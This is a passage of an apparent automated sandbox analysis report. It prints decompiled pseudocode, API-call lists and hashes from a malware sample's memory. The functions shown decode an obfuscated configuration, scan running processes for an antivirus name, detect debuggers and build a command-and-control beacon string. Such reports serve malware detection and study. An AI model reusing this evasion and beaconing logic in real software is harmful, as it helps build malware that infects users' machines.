						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E02C89186();
					if(_t19 != 0) {
						_t22 =  *0x2c8d338; // 0x50e9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x02c867cc
0x02c867d0
0x02c867d1
0x02c867d2
0x02c867d7
0x02c867dc
0x02c867e3
0x02c867ea
0x00000000
0x00000000
0x02c867ec
0x02c867f1
0x02c867f2
0x02c867f9
0x02c86813
0x00000000
0x02c867fb
0x02c867fb
0x02c867fd
0x02c86800
0x02c86804
0x00000000
0x00000000
0x02c86806
0x02c86804
0x02c8681b
0x02c8681b
0x02c8681d
0x02c86824
0x02c86826
0x02c8682c
0x02c86833
0x02c86843
0x02c8683b
0x02c8683e
0x02c8683e
0x02c86846
0x02c86846
0x02c8684f
0x02c8684f
0x02c86819
0x00000000

APIs

Part of subcall function 02C89186: GetProcAddress.KERNEL32(36776F57,02C867DC), ref: 02C891A1

Part of subcall function 02C84C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02C84C66
Part of subcall function 02C84C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02C84C88
Part of subcall function 02C84C3B: memset.NTDLL ref: 02C84CA2
Part of subcall function 02C84C3B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02C84CE0
Part of subcall function 02C84C3B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C84CF4
Part of subcall function 02C84C3B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02C84D0B
Part of subcall function 02C84C3B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02C84D17
Part of subcall function 02C84C3B: lstrcat.KERNEL32(?,642E2A5C), ref: 02C84D58
Part of subcall function 02C84C3B: FindFirstFileA.KERNELBASE(?,?), ref: 02C84D6E

Part of subcall function 02C81546: lstrlen.KERNEL32(?,00000000,02C8D330,00000001,02C867F7,02C8D00C,02C8D00C,00000000,00000005,00000000,00000000,?,?,?,02C841AA,02C85D90), ref: 02C8154F
Part of subcall function 02C81546: mbstowcs.NTDLL ref: 02C81576
Part of subcall function 02C81546: memset.NTDLL ref: 02C81588

HeapFree.KERNEL32(00000000,02C8D00C,02C8D00C,02C8D00C,00000000,00000005,00000000,00000000,?,?,?,02C841AA,02C85D90,02C8D00C,?,02C85D90), ref: 02C86813

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 6296ae1a5caf6da94d8d2901f870199beb00cdc2329f4d45c69b0229738d59be
Instruction ID: 90fb295c5f83ee94f8c1077772e0140b5f7f8364cea15a56cda8fe7e16dc4629
Opcode Fuzzy Hash: 6296ae1a5caf6da94d8d2901f870199beb00cdc2329f4d45c69b0229738d59be
Instruction Fuzzy Hash: 9C01F975600214AAE7107EE7DD80B7B76AEEF812ACB60C136F949D7150D6708D81AB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C84B9D, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C84B9D(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02C85AF6(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2c8d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02C8497C(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02c84b9d
0x02c84ba5
0x02c84bbc
0x02c84bd7
0x02c84bdb
0x02c84be0
0x02c84be2
0x02c84bf4
0x02c84c00
0x02c84be4
0x02c84be4
0x02c84be9
0x02c84bee
0x02c84bee
0x02c84be2
0x02c84c06
0x02c84c0a
0x02c84c0a
0x02c84bb1
0x02c84bb6
0x02c84bba
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02C8497C: SysFreeString.OLEAUT32(00000000), ref: 02C849DF

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,02C857D8,?,004F0053,050E9388,00000000,?), ref: 02C84C00

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: c7bbb99de7253a5297aadc221a498b2cbf943383029fc425734df337c45aa44b
Instruction ID: 5a77e3b55142fb5f800c2e986aa2ba79fa9a2eda568dbce5a4064535b0ee616d
Opcode Fuzzy Hash: c7bbb99de7253a5297aadc221a498b2cbf943383029fc425734df337c45aa44b
Instruction Fuzzy Hash: DA014F7250051ABBCB36EF98CC00FEA7B69EF44794F04C519FE059A120D731CA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C86872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02C86872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x02c86872
0x02c8687f
0x02c86880
0x02c86881
0x02c86888
0x02c868b6
0x02c868b7
0x02c868ba
0x02c868c0
0x00000000
0x00000000
0x02c8689f
0x02c868a9
0x02c868b0
0x00000000
0x02c868a1
0x02c868a4
0x02c868c4
0x02c868a6
0x02c868a6
0x00000000
0x02c868a6
0x02c868a4
0x02c868cb
0x02c868d1
0x02c868d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 02C868BA

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e225c2af4b5406f31eecc6dfe022da146d17f5606ee5770d2316792b1c760b27
Instruction ID: 2424d822ff1687f4e8bfd94957c690efd7f084ff77edbef6136418043696c9ae
Opcode Fuzzy Hash: e225c2af4b5406f31eecc6dfe022da146d17f5606ee5770d2316792b1c760b27
Instruction Fuzzy Hash: D4F0F975D01218EFDB04EBD5C988AEDB7BCEF44349F2084AAE506A7240D7B46B84CF65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C8696A, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02C8696A(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x2c8d2a0; // 0x63699bc3
				if(E02C8A4D4( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x2c8d2d4 = _v12;
				}
				_t25 =  *0x2c8d2a0; // 0x63699bc3
				if(E02C8A4D4( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x2c8d2a0; // 0x63699bc3
						_t31 = E02C87FC0(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x2c8d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x2c8d2a0; // 0x63699bc3
						_t32 = E02C87FC0(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x2c8d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x2c8d2a0; // 0x63699bc3
						_t33 = E02C87FC0(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x2c8d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x2c8d2a0; // 0x63699bc3
						_t34 = E02C87FC0(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x2c8d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x2c8d2a0; // 0x63699bc3
						_t35 = E02C87FC0(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x2c8d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x2c8d2a0; // 0x63699bc3
						_t36 = E02C87FC0(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E02C889D2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E02C85DDD();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x2c8d2a0; // 0x63699bc3
						_t37 = E02C87FC0(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E02C889D2(0, _t37) != 0) {
						_t102 =  *0x2c8d32c; // 0x50e95b0
						E02C8804C(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x2c8d2a0; // 0x63699bc3
						_t38 = E02C87FC0(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x2c8d2a4; // 0x245a5a8
						_t18 = _t39 + 0x2c8e252; // 0x616d692f
						 *0x2c8d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E02C889D2(0, _t38);
						 *0x2c8d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x2c8d2a0; // 0x63699bc3
								_t41 = E02C87FC0(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x2c8d2a4; // 0x245a5a8
								_t19 = _t42 + 0x2c8e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E02C889D2(0, _t41);
							}
							 *0x2c8d340 = _t43;
							HeapFree( *0x2c8d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x02c8696a
0x02c8696d
0x02c8698d
0x02c8699b
0x02c8699b
0x02c869a0
0x02c869ba
0x02c86bb8
0x02c86bba
0x00000000
0x02c869c0
0x02c869c0
0x02c869c7
0x02c869dd
0x02c869c9
0x02c869c9
0x02c869d6
0x02c869d6
0x02c869e7
0x02c869e9
0x02c869f3
0x02c869f8
0x02c869f8
0x02c869f3
0x02c869ff
0x02c86a15
0x02c86a01
0x02c86a01
0x02c86a0e
0x02c86a0e
0x02c86a19
0x02c86a1b
0x02c86a25
0x02c86a2a
0x02c86a2a
0x02c86a25
0x02c86a31
0x02c86a47
0x02c86a33
0x02c86a33
0x02c86a40
0x02c86a40
0x02c86a4b
0x02c86a4d
0x02c86a57
0x02c86a5c
0x02c86a5c
0x02c86a57
0x02c86a63
0x02c86a79
0x02c86a65
0x02c86a65
0x02c86a72
0x02c86a72
0x02c86a7d
0x02c86a7f
0x02c86a89
0x02c86a8e
0x02c86a8e
0x02c86a89
0x02c86a95
0x02c86aab
0x02c86a97
0x02c86a97
0x02c86aa4
0x02c86aa4
0x02c86aaf
0x02c86ab1
0x02c86abb
0x02c86ac0
0x02c86ac0
0x02c86abb
0x02c86ac7
0x02c86add
0x02c86ac9
0x02c86ac9
0x02c86ad6
0x02c86ad6
0x02c86ae1
0x02c86ae3
0x02c86ae6
0x02c86ae7
0x02c86aee
0x02c86af0
0x02c86af1
0x02c86af1
0x02c86aee
0x02c86af8
0x02c86b0e
0x02c86afa
0x02c86afa
0x02c86b07
0x02c86b07
0x02c86b12
0x02c86b20
0x02c86b2a
0x02c86b2a
0x02c86b31
0x02c86b47
0x02c86b33
0x02c86b33
0x02c86b40
0x02c86b40
0x02c86b4b
0x02c86b5e
0x02c86b5e
0x02c86b63
0x02c86b69
0x00000000
0x02c86b4d
0x02c86b50
0x02c86b55
0x02c86b5c
0x02c86b6e
0x02c86b70
0x02c86b86
0x02c86b72
0x02c86b72
0x02c86b7f
0x02c86b7f
0x02c86b8a
0x02c86b96
0x02c86b9b
0x02c86b9b
0x02c86b8c
0x02c86b8f
0x02c86b8f
0x02c86ba9
0x02c86bae
0x02c86bbb
0x02c86bbf
0x02c86bbf
0x00000000
0x02c86b5c
0x02c86b4b

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C869EF
StrToIntExA.SHLWAPI(00000000,00000000,?,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C86A21
StrToIntExA.SHLWAPI(00000000,00000000,?,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C86A53
StrToIntExA.SHLWAPI(00000000,00000000,?,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C86A85
StrToIntExA.SHLWAPI(00000000,00000000,?,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C86AB7
HeapFree.KERNEL32(00000000,02C85D85,02C85D85,?,63699BC3,02C85D85,?,63699BC3,00000005,02C8D00C,00000008,?,02C85D85), ref: 02C86BAE

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 479cd5b67d0d768596a15f232612d6953daa4d8e9fc94155e96eb5c9e74194b8
Instruction ID: 1106e000d5a1c2ef72360f12d921a59629a9047c743696c61cc8b551a37ea21e
Opcode Fuzzy Hash: 479cd5b67d0d768596a15f232612d6953daa4d8e9fc94155e96eb5c9e74194b8
Instruction Fuzzy Hash: 8561A170A40114AEC710FBB99D88D6B77AEABC834C775CE26E502D7148EB31DE51DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C150C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D4C56C7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D4C56DC
UnhandledExceptionFilter.KERNEL32(6D4EFA48), ref: 6D4C56E7
GetCurrentProcess.KERNEL32(C0000409), ref: 6D4C5703
TerminateProcess.KERNEL32(00000000), ref: 6D4C570A

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8a1b9f0efcb6e64b3d1f0511ba6a4a0ca3f5118cb068fada8b633b5996ab6736
Instruction ID: 7c0c4fbb1f20df1c401e67a8bd1eefa13e2ee3a66680de7b1e357c40671989d4
Opcode Fuzzy Hash: 8a1b9f0efcb6e64b3d1f0511ba6a4a0ca3f5118cb068fada8b633b5996ab6736
Instruction Fuzzy Hash: 1D21E2B8904204DFCF01FF25D588B563BB4FB6A305F52805EE50987B58EBB59981CF45

Uniqueness

Uniqueness Score: -1.00%

Function 02C87F56, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02C87F56() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2c8d2a4; // 0x245a5a8
						_t2 = _t9 + 0x2c8ee54; // 0x73617661
						_push( &_v264);
						if( *0x2c8d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02c87f61
0x02c87f6b
0x02c87f6f
0x02c87f79
0x02c87faa
0x02c87f80
0x02c87f85
0x02c87f92
0x02c87f9b
0x02c87fb2
0x02c87f9d
0x02c87fa5
0x00000000
0x02c87fa5
0x02c87fb3
0x02c87fb4
0x00000000
0x02c87fb4
0x00000000
0x02c87fae
0x02c87fba
0x02c87fbf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C87F66
Process32First.KERNEL32(00000000,?), ref: 02C87F79
Process32Next.KERNEL32(00000000,?), ref: 02C87FA5
CloseHandle.KERNEL32(00000000), ref: 02C87FB4

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c00a309aec3ca74c4e0865551d2bf1bc123f54ec467c83ef32013c38ec77a206
Instruction ID: 66383deaab6b4c81b01d43e440930d593c041aefa06f219dca984a10367209b9
Opcode Fuzzy Hash: c00a309aec3ca74c4e0865551d2bf1bc123f54ec467c83ef32013c38ec77a206
Instruction Fuzzy Hash: C9F096365001256AD720B6779D48FEBF66DDFC5758F018161F909D2044F731CA5ACBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02C82941, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02C82941(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2c8d018; // 0x99c08bf
				asm("bswap eax");
				_t27 =  *0x2c8d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2c8d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2c8d00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0x2c8d2a4; // 0x245a5a8
				_t3 = _t30 + 0x2c8e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d154, _t29, _t28, _t27, _t26,  *0x2c8d02c,  *0x2c8d004, _t25);
				_t33 = E02C82914();
				_t34 =  *0x2c8d2a4; // 0x245a5a8
				_t4 = _t34 + 0x2c8e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02C83F0E(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2c8d2a4; // 0x245a5a8
					_t6 = _t83 + 0x2c8e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2c8d238, 0, _t96);
				}
				_t97 = E02C81363();
				if(_t97 != 0) {
					_t78 =  *0x2c8d2a4; // 0x245a5a8
					_t8 = _t78 + 0x2c8e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2c8d238, 0, _t97);
				}
				_t98 =  *0x2c8d32c; // 0x50e95b0
				_a32 = E02C818D5(0x2c8d00a, _t98 + 4);
				_t42 =  *0x2c8d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2c8d2a4; // 0x245a5a8
					_t11 = _t74 + 0x2c8e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2c8d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2c8d2a4; // 0x245a5a8
					_t13 = _t71 + 0x2c8e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2c8d238, 0, 0x800);
					if(_t100 != 0) {
						E02C86852(GetTickCount());
						_t50 =  *0x2c8d32c; // 0x50e95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2c8d32c; // 0x50e95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2c8d32c; // 0x50e95b0
						_t103 = E02C88840(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2c8c2ac);
							_push(_t103);
							_t62 = E02C88007();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02C86146(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02C845F1();
								}
								HeapFree( *0x2c8d238, 0, _v44);
							}
							HeapFree( *0x2c8d238, 0, _t103);
						}
						HeapFree( *0x2c8d238, 0, _t100);
					}
					HeapFree( *0x2c8d238, 0, _a24);
				}
				HeapFree( *0x2c8d238, 0, _t105);
				return _a12;
			}

0x02c82941
0x02c82941
0x02c82941
0x02c82946
0x02c8294c
0x02c82956
0x02c82958
0x02c82958
0x02c82965
0x02c82970
0x02c82973
0x02c8297e
0x02c82981
0x02c82986
0x02c82989
0x02c8298e
0x02c82991
0x02c8299d
0x02c829aa
0x02c829ac
0x02c829b2
0x02c829b7
0x02c829c2
0x02c829c4
0x02c829c7
0x02c829ce
0x02c829d2
0x02c829d4
0x02c829d9
0x02c829e5
0x02c829e7
0x02c829f3
0x02c829f5
0x02c829f5
0x02c82a00
0x02c82a04
0x02c82a06
0x02c82a0b
0x02c82a17
0x02c82a19
0x02c82a25
0x02c82a27
0x02c82a27
0x02c82a2d
0x02c82a40
0x02c82a44
0x02c82a4b
0x02c82a4e
0x02c82a53
0x02c82a5e
0x02c82a60
0x02c82a63
0x02c82a63
0x02c82a65
0x02c82a6c
0x02c82a6f
0x02c82a74
0x02c82a7e
0x02c82a80
0x02c82a88
0x02c82aa1
0x02c82aa5
0x02c82ab1
0x02c82ab6
0x02c82abf
0x02c82ad0
0x02c82ad4
0x02c82add
0x02c82ae3
0x02c82af0
0x02c82afd
0x02c82b03
0x02c82b0f
0x02c82b15
0x02c82b16
0x02c82b1b
0x02c82b21
0x02c82b27
0x02c82b2e
0x02c82b35
0x02c82b3b
0x02c82b42
0x02c82b46
0x02c82b51
0x02c82b56
0x02c82b5c
0x02c82b65
0x02c82b65
0x02c82b76
0x02c82b76
0x02c82b85
0x02c82b85
0x02c82b94
0x02c82b94
0x02c82ba6
0x02c82ba6
0x02c82bb5
0x02c82bc6

APIs

GetTickCount.KERNEL32 ref: 02C82958
wsprintfA.USER32 ref: 02C829A5
wsprintfA.USER32 ref: 02C829C2
wsprintfA.USER32 ref: 02C829E5
HeapFree.KERNEL32(00000000,00000000), ref: 02C829F5
wsprintfA.USER32 ref: 02C82A17
HeapFree.KERNEL32(00000000,00000000), ref: 02C82A27
wsprintfA.USER32 ref: 02C82A5E
wsprintfA.USER32 ref: 02C82A7E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C82A9B
GetTickCount.KERNEL32 ref: 02C82AAB
RtlEnterCriticalSection.NTDLL(050E9570), ref: 02C82ABF
RtlLeaveCriticalSection.NTDLL(050E9570), ref: 02C82ADD

Part of subcall function 02C88840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,02C82AF0,?,050E95B0), ref: 02C8886B
Part of subcall function 02C88840: lstrlen.KERNEL32(?,?,?,02C82AF0,?,050E95B0), ref: 02C88873
Part of subcall function 02C88840: strcpy.NTDLL ref: 02C8888A
Part of subcall function 02C88840: lstrcat.KERNEL32(00000000,?), ref: 02C88895
Part of subcall function 02C88840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C82AF0,?,050E95B0), ref: 02C888B2

StrTrimA.SHLWAPI(00000000,02C8C2AC,?,050E95B0), ref: 02C82B0F

Part of subcall function 02C88007: lstrlen.KERNEL32(050E9918,00000000,00000000,745EC740,02C82B1B,00000000), ref: 02C88017
Part of subcall function 02C88007: lstrlen.KERNEL32(?), ref: 02C8801F
Part of subcall function 02C88007: lstrcpy.KERNEL32(00000000,050E9918), ref: 02C88033
Part of subcall function 02C88007: lstrcat.KERNEL32(00000000,?), ref: 02C8803E

lstrcpy.KERNEL32(00000000,?), ref: 02C82B2E
lstrcpy.KERNEL32(00000000,00000000), ref: 02C82B35
lstrcat.KERNEL32(00000000,?), ref: 02C82B42
